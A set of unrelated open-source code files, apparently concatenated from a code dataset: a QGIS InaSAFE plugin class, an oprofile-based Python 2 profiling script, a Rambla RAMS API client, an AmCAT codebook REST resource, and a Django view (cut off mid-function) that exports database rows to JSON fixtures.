if os.path.exists(myTranslationPath):
self.translator = QTranslator()
myResult = self.translator.load(myTranslationPath)
if not myResult:
myMessage = 'Failed to load translation for %s' % myLocaleName
raise TranslationLoadError(myMessage)
QCoreApplication.installTranslator(self.translator)
LOGGER.debug('%s %s' % (myTranslationPath,
os.path.exists(myTranslationPath)))
def tr(self, theString):
"""We implement this ourself since we do not inherit QObject.
Args:
theString - string for translation.
Returns:
Translated version of theString.
Raises:
no exceptions explicitly raised.
"""
return QCoreApplication.translate('Plugin', theString)
#noinspection PyCallByClass
def initGui(self):
"""Gui initialisation procedure (for QGIS plugin api).
This method is called by QGIS and should be used to set up
any graphical user interface elements that should appear in QGIS by
default (i.e. before the user performs any explicit action with the
plugin).
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# Import dock here as it needs to be imported AFTER i18n is set up
from safe_qgis.dock import Dock
self.dockWidget = None
#--------------------------------------
# Create action for plugin dockable window (show/hide)
#--------------------------------------
# pylint: disable=W0201
self.actionDock = QAction(QIcon(':/plugins/inasafe/icon.png'),
self.tr('Toggle InaSAFE Dock'), self.iface.mainWindow())
self.actionDock.setObjectName('InaSAFEDockToggle')
self.actionDock.setStatusTip(self.tr(
'Show/hide InaSAFE dock widget'))
self.actionDock.setWhatsThis(self.tr(
'Show/hide InaSAFE dock widget'))
self.actionDock.setCheckable(True)
self.actionDock.setChecked(True)
QObject.connect(self.actionDock, SIGNAL('triggered()'),
self.showHideDockWidget)
# add to plugin toolbar
self.iface.addToolBarIcon(self.actionDock)
# add to plugin menu
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionDock)
#--------------------------------------
# Create action for keywords editor
#--------------------------------------
self.actionKeywordsDialog = QAction(
QIcon(':/plugins/inasafe/keywords.png'),
self.tr('InaSAFE Keyword Editor'),
self.iface.mainWindow())
self.actionKeywordsDialog.setStatusTip(self.tr(
'Open InaSAFE keywords editor'))
self.actionKeywordsDialog.setWhatsThis(self.tr(
'Open InaSAFE keywords editor'))
self.actionKeywordsDialog.setEnabled(False)
QObject.connect(self.actionKeywordsDialog, SIGNAL('triggered()'),
self.showKeywordsEditor)
self.iface.addToolBarIcon(self.actionKeywordsDialog)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionKeywordsDialog)
#--------------------------------------
# Create action for reset icon
#--------------------------------------
self.actionResetDock = QAction(
QIcon(':/plugins/inasafe/reload.png'),
self.tr('Reset Dock'), self.iface.mainWindow())
self.actionResetDock.setStatusTip(self.tr(
'Reset the InaSAFE Dock'))
self.actionResetDock.setWhatsThis(self.tr(
'Reset the InaSAFE Dock'))
QObject.connect(self.actionResetDock, SIGNAL('triggered()'),
self.resetDock)
self.iface.addToolBarIcon(self.actionResetDock)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionResetDock)
#--------------------------------------
# Create action for options dialog
#--------------------------------------
self.actionOptions = QAction(
QIcon(':/plugins/inasafe/options.png'),
self.tr('InaSAFE Options'), self.iface.mainWindow())
self.actionOptions.setStatusTip(self.tr(
'Open InaSAFE options dialog'))
self.actionOptions.setWhatsThis(self.tr(
'Open InaSAFE options dialog'))
QObject.connect(self.actionOptions, SIGNAL('triggered()'),
self.showOptions)
self.iface.addToolBarIcon(self.actionOptions)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionOptions)
#--------------------------------------
# Create action for impact functions doc dialog
#--------------------------------------
self.actionImpactFunctionsDoc = QAction(
QIcon(':/plugins/inasafe/functions-table.png'),
self.tr('InaSAFE Impact Functions Browser'),
self.iface.mainWindow())
self.actionImpactFunctionsDoc.setStatusTip(self.tr(
'Open InaSAFE Impact Functions Browser'))
self.actionImpactFunctionsDoc.setWhatsThis(self.tr(
'Open InaSAFE Impact Functions Browser'))
QObject.connect(self.actionImpactFunctionsDoc, SIGNAL('triggered()'),
self.showImpactFunctionsDoc)
self.iface.addToolBarIcon(self.actionImpactFunctionsDoc)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionImpactFunctionsDoc)
# Short cut for Open Impact Functions Doc
self.keyAction = QAction("Test Plugin", self.iface.mainWindow())
self.iface.registerMainWindowAction(self.keyAction, "F7")
QObject.connect(self.keyAction, SIGNAL("triggered()"),
self.keyActionF7)
#---------------------------------------
# Create action for minimum needs dialog
#---------------------------------------
self.actionMinimumNeeds = QAction(
QIcon(':/plugins/inasafe/minimum_needs.png'),
self.tr('InaSAFE Minimum Needs Tool'), self.iface.mainWindow())
self.actionMinimumNeeds.setStatusTip(self.tr(
'Open InaSAFE minimum needs tool'))
self.actionMinimumNeeds.setWhatsThis(self.tr(
'Open InaSAFE minimum needs tool'))
QObject.connect(self.actionMinimumNeeds, SIGNAL('triggered()'),
self.showMinimumNeeds)
self.iface.addToolBarIcon(self.actionMinimumNeeds)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionMinimumNeeds)
#--------------------------------------
# create dockwidget and tabify it with the legend
#--------------------------------------
self.dockWidget = Dock(self.iface)
self.iface.addDockWidget(Qt.RightDockWidgetArea, self.dockWidget)
        myLegendTab = self.iface.mainWindow().findChild(QDockWidget, 'Legend')
if myLegendTab:
self.iface.mainWindow().tabifyDockWidget(
myLegendTab, self.dockWidget)
self.dockWidget.raise_()
#
# Hook up a slot for when the current layer is changed
#
QObject.connect(self.iface,
SIGNAL("currentLayerChanged(QgsMapLayer*)"),
self.layerChanged)
#
# Hook up a slot for when the dock is hidden using its close button
# or view-panels
#
QObject.connect(self.dockWidget,
SIGNAL("visibilityChanged (bool)"),
self.toggleActionDock)
# pylint: disable=W0201
def unload(self):
"""Gui breakdown procedure (for QGIS plugin api).
This method is called by QGIS and should be used to *remove*
any graphical user interface elements that should appear in QGIS.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# Remove the plugin menu item and icon
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionDock)
self.iface.removeToolBarIcon(self.actionDock)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionKeywordsDialog)
self.iface.removeToolBarIcon(self.actionKeywordsDialog)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionResetDock)
self.iface.removeToolBarIcon(self.actionResetDock)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionOptions)
self.iface.removeToolBarIcon(self.actionOptions)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionMinimumNeeds)
self.iface.removeToolBarIcon(self.actionMinimumNeeds)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionImpactFunctionsDoc)
self.iface.removeToolBarIcon(self.actionImpactFunctionsDoc)
self.iface.mainWindow().removeDockWidget(self.dockWidget)
self.dockWidget.setVisible(False)
self.dockWidget.destroy()
QObject.disconnect(self.iface,
SIGNAL("currentLayerChanged(QgsMapLayer*)"),
self.layerChanged)
def toggleActionDock(self, checked):
"""check or uncheck the toggle inaSAFE toolbar button.
This slot is called when the user hides the inaSAFE panel using its
close button or using view->panels
.. see also:: :func:`Plugin.initGui`.
Args:
checked - if actionDock has to be checked or not
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
self.actionDock.setChecked(checked)
# Run method that performs all the real work
def showHideDockWidget(self):
"""Show or hide the dock widget.
This slot is called when the user clicks the toolbar icon or
menu item associated with this plugin. It will hide or show
the dock depending on its current state.
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
if self.dockWidget.isVisible():
self.dockWidget.setVisible(False)
else:
self.dockWidget.setVisible(True)
self.dockWidget.raise_()
def showMinimumNeeds(self):
"""Show the minimum needs dialog.
This slot is called when the user clicks the minimum needs toolbar
icon or menu item associated with this plugin.
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.minimum_needs import MinimumNeeds
myDialog = MinimumNeeds(self.iface.mainWindow())
myDialog.show()
def showOptions(self):
"""Show the options dialog.
This slot is called when the user clicks the options toolbar
icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.options_dialog import OptionsDialog
myDialog = OptionsDialog(self.iface.mainWindow(),
self.iface,
self.dockWidget)
myDialog.show()
def showKeywordsEditor(self):
"""Show the keywords editor.
This slot is called when the user clicks the keyword editor toolbar
icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.keywords_dialog import KeywordsDialog
if self.iface.activeLayer() is None:
return
myDialog = KeywordsDialog(self.iface.mainWindow(),
self.iface,
self.dockWidget)
myDialog.setModal(True)
myDialog.show()
def showImpactFunctionsDoc(self):
"""Show the keywords editor.
This slot is called when the user clicks the impact functions
toolbar icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# import here only so that it is AFTER i18n set up
from safe_qgis.impact_functions_doc import ImpactFunctionsDoc
myDialog = ImpactFunctionsDoc(self.iface.mainWindow())
myDialog.show()
def resetDock(self):
"""Reset the dock to its default state.
This slot is called when the user clicks the reset icon in the toolbar
or the reset menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
self.dockWidget.getLayers()
def layerChanged(self, theLayer):
"""Enable or disable the keywords editor icon.
This slot is called when the user clicks the keyword editor toolbar
icon or menu item associated with this plugin
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
if theLayer is None:
self.actionKeywordsDialog.setEnabled(False)
else:
self.actionKeywordsDialog.setEnabled(True)
self.dockWidget.layerChanged(theLayer)
def keyActionF7(self):
        '''Executed when the user presses F7.'''
self.showImpactFunctionsDoc()
| gpl-3.0 | 2,372,328,170,521,274,000 | 36.894737 | 79 | 0.567438 | false | 4.771723 | false | false | false |
percival-detector/cppprocessing | tools/profile_processing.py | 1 | 13073 |
import re
import subprocess
import socket
import calibration_data_generator as cdg
import output_processing as op
import datetime
def run_the_function(print_result, height, width, repeat, text_file_name, grain_size):
path_name= "./data/KnifeQuadBPos1_2_21_int16.h5"
top_level_data_set_name= "KnifeQuadBPos1/"
host_name = socket.gethostname()
#Program to execute
debug_version = './Debug/cppProcessing2.0 '
profile_version = './Profiling/cppProcessing2.0 '
parallel_debug = './parallel_debug/cppProcessing2.0 '
parallel_profile = './parallel_profile/cppProcessing2.0 '
cmdl_arg = '1 ' + str(width) + ' '+ str(height) + ' ' + str(repeat) + ' ' + text_file_name + ' ' + str(grain_size) + ' 1'
program_to_execute = parallel_profile + cmdl_arg
#events to monitor
#instructions
event1 = op.oprofile_events('CPU_CLK_UNHALTED','0x00',100000000)
event2 = op.oprofile_events('INST_RETIRED','0x00',60000000)
#cache misses
event3 = op.oprofile_events('LLC_MISSES','0x41',60000) #divide by LLC_REFS
# event4 = op.oprofile_events('l2_lines_in','0x07',1000000) #100000
# event5 = op.oprofile_events('br_inst_retired', '0x01', 400000) #total branch instructions retired
# event6 = op.oprofile_events('br_misp_retired', '0x01', 400000) #total mispredicted branches. Divide by br_inst_retired
event6 = op.oprofile_events('mem_trans_retired','0x02',2000000)
# event7 = op.oprofile_events('uops_retired', 'stall_cycles',2000000) #no of stall cycles. Divide by cpu cycles
#
# event8 = op.oprofile_events('dtlb_load_misses', '0x01',2000000)
# # event8 = op.oprofile_events('dtlb_load_misses', '0x81',1000) #Ivy Bridge
#
# event9 = op.oprofile_events('LLC_REFS', '0x4f',6000)
#
# event10 = op.oprofile_events('l1d_pend_miss', 'pending',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles
# event11 = op.oprofile_events('resource_stalls', '0x01',2000000) #no of stall cycles/divide by number of instructions
# event12 = op.oprofile_events('l1d', '0x01',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles
list_of_events = [event1, event2, event3, event6]#, event7, event8, event9, event10, event11, event12]
#variable initialisation
dict_of_attributes = {}
total_time = 0.0
dict_of_function_perc_time = {}
list_of_events_recorded = []
    image_size = width * height * 2  # memory size in bytes (2 bytes per int16 pixel)
total_processing_time = 0.0
operf_events = op.get_operf_option(list_of_events)
result_directory = './oprof_reports/'+ host_name + '/'
report_destination = result_directory + 'profile_report.txt'
sample_data_destination = result_directory + 'oprof_data/'
#commandline options
cmd_git = 'git rev-parse HEAD > ' + report_destination
cmd_time = '(/usr/bin/time -v ' + program_to_execute + ') &>> ' + report_destination
cmd_operf = 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' '+ program_to_execute
cmd_opreport = 'opreport --symbols --session-dir=' + sample_data_destination + ' >> ' + report_destination
cmd_mkdir = 'mkdir -p ' + sample_data_destination
cmd_annotate = 'opannotate -s --output-dir=' + result_directory + 'annotated/ ' + '--session-dir=' + sample_data_destination + ' '+ program_to_execute
op.cmd_call(cmd_git)
op.cmd_call(cmd_time)
op.cmd_call(cmd_operf)
op.cmd_call(cmd_opreport)
op.cmd_call(cmd_mkdir)
op.cmd_call(cmd_annotate)
f = open(report_destination, 'r')
list_of_functions = op.get_function_list(f)
f.close()
for function_name in list_of_functions:
dict_of_function_perc_time[function_name] = 0
dict_of_attributes[function_name] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
f = open(report_destination, 'r')
s = f.readline()
commit_key = s;
while s != '':
if 'Counted' in s:
for event in list_of_events:
if (event.event_name + ' events') in s:
list_of_events_recorded.append(event)
if 'Elapsed (wall clock) time ' in s:
total_time = op.parse_time(s)
for function_name in list_of_functions:
if function_name in s:
delimited = s.split(' ')
parsed = [item for item in delimited if item != '']
attributes = []
dict_of_function_perc_time[function_name] = float(parsed[1]) + dict_of_function_perc_time[function_name]
for index in xrange(len(list_of_events_recorded)): # manually add the percentage clock cycles
attributes.append( float(parsed[index * 2]) + dict_of_attributes[function_name][index] )
dict_of_attributes[function_name] = attributes
s = f.readline()
llc_misses_per_instruction = op.get_llc_misses(list_of_functions, dict_of_attributes, list_of_events_recorded)
CPI = op.get_CPI(list_of_functions, dict_of_attributes, list_of_events_recorded)
bandwidth = op.get_bandwidth(list_of_functions, dict_of_function_perc_time, total_time, image_size, repeat)
function_time = op.get_time(list_of_functions, dict_of_function_perc_time, total_time, repeat)
l1d_miss_rate = op.get_L1D_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
DTLB_miss_rate = op.get_DTLB_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
LLC_miss_rate = op.get_LLC_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
br_misspre_rate = op.get_br_mispre_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
resource_stall = op.get_resource_stall_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
l2_miss_rate = op.get_L2_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
l1d_repl_rate = op.get_L1D_repl_rate(list_of_functions, dict_of_attributes, list_of_events_recorded)
memory_bandwidth = op.get_memory_bandwidth(list_of_functions, dict_of_attributes, list_of_events_recorded)
for name, perc_time in dict_of_function_perc_time.iteritems():
total_processing_time = total_processing_time + perc_time * total_time /1000 /100 #in seconds
#printing reports
if print_result == True:
print
print datetime.datetime.now().date(),
print datetime.datetime.now().time(),
print 'Report:'
print cmd_time
print cmd_operf
print cmd_opreport
print 'oprofile sample directory: ' + sample_data_destination
print cmd_annotate
print '=' * 100
print commit_key,
print 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' '+ program_to_execute
print 'The program took {0:.4} ms in total. {1:.4} ms per sample/reset pair.'.format(total_time, total_time/repeat)
print 'Of which the processing functions took in total {0:.4} ms to run.'.format(total_processing_time)
print 'Image size {0:d} ({1:d} * {2:d}) pixels.'.format(width * height, height, width),
print op.get_bytes(image_size)
print 'Statistics collected for '+str(repeat)+' iterations'
print 'Bandwidth:'
print '\t' + 'Total: {0:.4} MB/s'.format(op.get_bytes(image_size * 2 * repeat/total_processing_time) ) #2 because of sample and reset
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0}'.format(op.get_bytes((bandwidth[index]))) + '/s'
print 'LLC misses per instruction:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(llc_misses_per_instruction[index])
print 'Cycle per instruction (CPI):'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2}'.format(CPI[index])
print 'Processing time (ms) for each call:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0}'.format(int(function_time[index]))
if len(l1d_miss_rate) != 0:
print 'L1D misses percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(l1d_miss_rate[index])
if len(l1d_repl_rate) != 0:
print 'L1D replacement rate:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(l1d_repl_rate[index])
if len(l2_miss_rate) != 0:
print 'L2 misses percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(l2_miss_rate[index])
if len(DTLB_miss_rate) != 0:
print 'DTLB miss per instruction:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2}'.format(DTLB_miss_rate[index])
if len(LLC_miss_rate) != 0:
print 'LLC miss rate:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(LLC_miss_rate[index])
if len(br_misspre_rate) != 0:
print 'Branch misprediction percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(br_misspre_rate[index])
if len(resource_stall) != 0:
print 'Resource stall cycle percentage:'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + '{0:.2%}'.format(resource_stall[index])
if len(memory_bandwidth) != 0:
print 'Memory Bandwidth'
for function in list_of_functions:
index = list_of_functions.index(function)
print '\t' + function +':' + op.get_bytes(memory_bandwidth[index])
print '=' * 100
return image_size * 2 * repeat/total_processing_time
repeat = 100 #350 is about the maximum
# width_arr = [2000, 5000, 10000, 20000, 50000, 100000, 500000]
height = 3717
width = 3528
host_name = socket.gethostname()
calib_directory = './calibration_data/'
path_name = calib_directory + host_name + '/'
text_file_name = path_name + 'test_param_file.txt'
grain_size_file_name = './oprof_reports/' + host_name + '/' + 'grain_size_test.txt'
print grain_size_file_name
# subprocess.call('mkdir -p ' + path_name, shell=True)
# cdg.generate_calib_files(height, width, text_file_name, path_name)
# cmd_rm_file = "rm -f " + grain_size_file_name
# cmd_create_file = "touch "+ grain_size_file_name
# op.cmd_call(cmd_rm_file)
# op.cmd_call(cmd_create_file)
grain_size = 3528 * 2
run_the_function(True, height, width, repeat, text_file_name, grain_size)
# 1,3,7,9,21, 59,63,177,413,531,
# * 1239,3717
# for grain_size in (3528, 3528/2,3528/3,3528/4,3528/6,3528/7, 3528*3, 3528*7,3528*9, 3528*21, 3528*59, 3528*63, 3528*177,3528*413,3528*531,3528*1239):
# a = op.accumulator(grain_size_file_name, grain_size, 2)
# for repeats in xrange(1,2):
# bandwidth = run_the_function(True, height, width, repeat, text_file_name, grain_size)
# a.add_number(bandwidth)
# print grain_size, op.get_bytes(bandwidth)
# a.average()
#
# print 'starting'
# grain_size = 20
# run_the_function(True, height, width, repeat, text_file_name, grain_size)
# for index in xrange(9, 41):
# run_the_function(True, height, width, repeat, text_file_name, index)
# print index
# for grain_size in xrange(10000,1000000,2000):
# a = op.accumulator(grain_size_file_name, grain_size, 9)
# for repeats in xrange(1,9):
# bandwidth = run_the_function(False, height, width, repeat, text_file_name, grain_size)
# a.add_number(bandwidth[0])
# print grain_size, op.get_bytes(bandwidth[0])
# a.average()
# #
# width = 50000
# repeat_arr = [1,2,5,10,20,50,100]
# for repeat in repeat_arr:
# run_the_function(True, width, repeat)
#operf -e CPU_CLK_UNHALTED=100000:0:1:1,mem_load_uops_llc_hit_retired=100000:2:1:1,mem_load_uops_llc_hit_retired=100000:4:1:1,mem_load_uops_retired=100000:4:1:1, ./Debug/cppProcessing2.0 0 ./data/KnifeQuadBPos1_2_21_int16.h5 KnifeQuadBPos1/ 500
| apache-2.0 | -993,045,515,792,880,100 | 45.358156 | 244 | 0.615849 | false | 3.15392 | false | false | false |
vwflow/raws-python | raws_json/rams/service.py | 1 | 2364 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 rambla.eu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.import os
import json, os
import raws_json
from raws_json.raws_service import RawsService
class RamsService(RawsService):
def __init__(self, username, password, server=None, ssl = True):
""" Constructor for RamsService, used to send request to the RATS service.
:param username: Name of your Rambla user account
:param password: Pwd of your Rambla user account
:param server: Domain name of the RATS service (optional, default = "rams.enc01.rambla.be")
:param ssl: Set True to use SSL (your account must be SSL enabled) (optional, default = False)
"""
self.username = username
if server is None:
server = "rams.mon01.rambla.be"
super(RamsService, self).__init__(username = username, password = password, server = server, ssl = ssl)
def delete(self, uri):
""" Deletes any resource, given the uri. """
return self.Delete(uri = uri)
def getTotal(self, query = None):
""" Retrieves a total feed.
@return JobEntry object
"""
uri = "/total/"
if query:
query.feed = uri
uri = query.ToUri()
return self.Get(uri = uri)
def getTraffic(self, query = None):
""" Retrieves a total feed.
@return JobEntry object
"""
uri = "/traffic/"
if query:
query.feed = uri
uri = query.ToUri()
return self.Get(uri = uri)
def getStorage(self, query = None):
""" Retrieves a total feed.
@return JobEntry object
"""
uri = "/storage/"
if query:
query.feed = uri
uri = query.ToUri()
return self.Get(uri = uri)
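# Illustrative usage sketch (not part of the original module); the credentials
# below are placeholders. Each getter simply issues a GET against the feed it
# names: /total/, /traffic/ or /storage/.
def _example_rams_usage():
    service = RamsService("my_user", "my_password")  # defaults to rams.mon01.rambla.be over SSL
    return service.getTotal(), service.getTraffic(), service.getStorage()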
| apache-2.0 | 2,433,817,785,288,375,300 | 32.295775 | 111 | 0.614636 | false | 4.00678 | false | false | false |
aemal/westcat | api/rest/resources/codebook.py | 2 | 4226 | ###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
from amcat.models import Codebook
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from api.rest.resources.amcatresource import AmCATResource
from django.conf.urls import url
import collections
import itertools
MAX_CODEBOOKS = 5
CACHE_LABELS = (2, 1)
def _walk(nodes):
"""Convert all TreeItems to dictionaries"""
for node in nodes:
node = node._asdict()
node['children'] = tuple(_walk(node['children']))
yield node
class CodebookHierarchyResource(AmCATResource):
"""
This resource has no direct relationship to one model. Instead, it's
composed of multiple codebooks. A thorough documentation of the design
of these hierarchies is available on the AmCAT wiki:
- https://code.google.com/p/amcat/wiki/Codebook
Any filters applied to this resource translate directly to filters on
codebooks. For example, you could request the hierarchy of codebook
with id '5' using the following query:
- /codebookhierarchy?id=5
Two special filters can be applied to hierarchies:
- include_missing_parents
- include_hidden
Each filter displayed above can either be true or false and do not
rely on each other. Both default to true.
"""
# ^ Docstring displayed on API web-page as documentation
model = Codebook
@classmethod
def get_url_pattern(cls):
"""The url pattern for use in the django urls routing table"""
pattern = r'^{}$'.format(cls.get_view_name())
return url(pattern, cls.as_view(), name=cls.get_view_name())
@classmethod
def get_view_name(cls):
return cls.__name__[:-8].lower()
@classmethod
def get_model_name(cls):
return "codebookhierarchy"
@classmethod
def get_tree(cls, codebook, include_labels=True, **kwargs):
"""Codebook.get_tree() with caching enabled"""
codebook.cache()
codebook.cache_labels()
return tuple(_walk(codebook.get_tree(include_labels=include_labels, **kwargs)))
def _get(self, request, *args, **kwargs):
qs = self.filter_queryset(self.get_queryset())
if len(qs) > MAX_CODEBOOKS:
return ("Please select at most {} codebook(s)".format(MAX_CODEBOOKS),)
else:
return itertools.chain.from_iterable(self.get_tree(codebook) for codebook in qs)
def get(self, request, *args, **kwargs):
return Response(self._get(request, *args, **kwargs))
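# Illustrative sketch (not part of the original module): the hierarchy endpoint
# documented above could be exercised with Django's test client. The URL prefix
# under which this API is mounted is an assumption here; the query parameters
# mirror the filters described in the class docstring.
def _example_hierarchy_query(client):
    # e.g. fetch the hierarchy of codebook 5, leaving hidden codes out
    return client.get("/codebookhierarchy", {"id": 5, "include_hidden": "false"})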
class CodebookResource(AmCATResource):
model = Codebook
extra_filters = ["codingschemafield__codingschema__id"]
from amcat.models import Label
from api.rest.resources.amcatresource import AmCATResource
class LabelResource(AmCATResource):
model = Label
extra_filters = ["code__codebook_codes__codebook__id"]
| agpl-3.0 | -7,087,378,154,601,933,000 | 36.070175 | 92 | 0.602461 | false | 4.329918 | false | false | false |
adbrum/InternetofThings | iot/baseDados/views.py | 1 | 14468 | # -*- coding: utf-8 -*-
"""
:Author: Adriano Leal
:Student: 11951
:email: [email protected]
"""
from django import template
from django.http.response import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from iot.models import Equipment, PhysicalCharacteristic, Voltage, Memory, \
Microcontroller, Microcomputer, GPU, Interface, Processor, Sensor, Template
def criar(request):
"""
    Creates .json files with the data contained in the database.
"""
microcontrolador = Microcontroller.objects.filter()
file_microcontroller = open("iot/fixtures/microcontroller.json", "w")
file_microcontroller.write("[\n")
qt = len(microcontrolador)
for item in microcontrolador:
file_microcontroller.write("\t{\n")
file_microcontroller.write("\t\t\"model\": \"iot.Microcontroller\",\n")
file_microcontroller.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
file_microcontroller.write("\t\t\"fields\": {\n")
file_microcontroller.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n")
file_microcontroller.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
file_microcontroller.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_microcontroller.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_microcontroller.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_microcontroller.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_microcontroller.write("\t}\n")
if qt > 1:
file_microcontroller.write("},\n")
else:
file_microcontroller.write("}\n")
qt -= 1
file_microcontroller.write("]\n")
file_microcontroller.close()
microComputer = Microcomputer.objects.filter()
file_microComputer = open("iot/fixtures/microComputer.json", "w")
file_microComputer.write("[\n")
qt = len(microComputer)
for item in microComputer:
file_microComputer.write("\t{\n")
file_microComputer.write("\t\t\"model\": \"iot.Microcomputer\",\n")
file_microComputer.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
file_microComputer.write("\t\t\"fields\": {\n")
file_microComputer.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n")
file_microComputer.write("\t\t\"model\" : \"" + (item.model).encode("utf-8\n") + "\",\n")
if item.processor_id==None:
file_microComputer.write("\t\t\"processor\" : null,\n")
else:
file_microComputer.write("\t\t\"processor\" : " + str(item.processor_id) + ",\n")
if item.microcontroller_id==None:
file_microComputer.write("\t\t\"microcontroller\" : null,\n")
else:
file_microComputer.write("\t\t\"microcontroller\" : " + str(item.microcontroller_id) + ",\n")
if item.GPU_id==None:
file_microComputer.write("\t\t\"GPU\" : null,\n")
else:
file_microComputer.write("\t\t\"GPU\" : " + str(item.GPU_id) + ",\n")
if item.operatingSystems_id==None:
file_microComputer.write("\t\t\"operatingSystems\" : null,\n")
else:
file_microComputer.write("\t\t\"operatingSystems\" : " + str(item.operatingSystems_id) + ",\n")
file_microComputer.write("\t\t\"dateManufacture\" : \"" + str(item.dateManufacture) + "\",\n")
file_microComputer.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_microComputer.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_microComputer.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_microComputer.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_microComputer.write("\t}\n")
if qt > 1:
file_microComputer.write("},\n")
else:
file_microComputer.write("}\n")
qt -= 1
file_microComputer.write("]\n")
file_microComputer.close()
caracteristica = PhysicalCharacteristic.objects.filter()
file_caracteristica = open("iot/fixtures/physicalCharacteristic.json", "w")
file_caracteristica.write("[\n")
qt = len(caracteristica)
for item in caracteristica:
file_caracteristica.write("\t{\n")
file_caracteristica.write("\t\t\"model\": \"iot.PhysicalCharacteristic\",\n")
file_caracteristica.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_caracteristica.write("\t\t\"fields\": {\n")
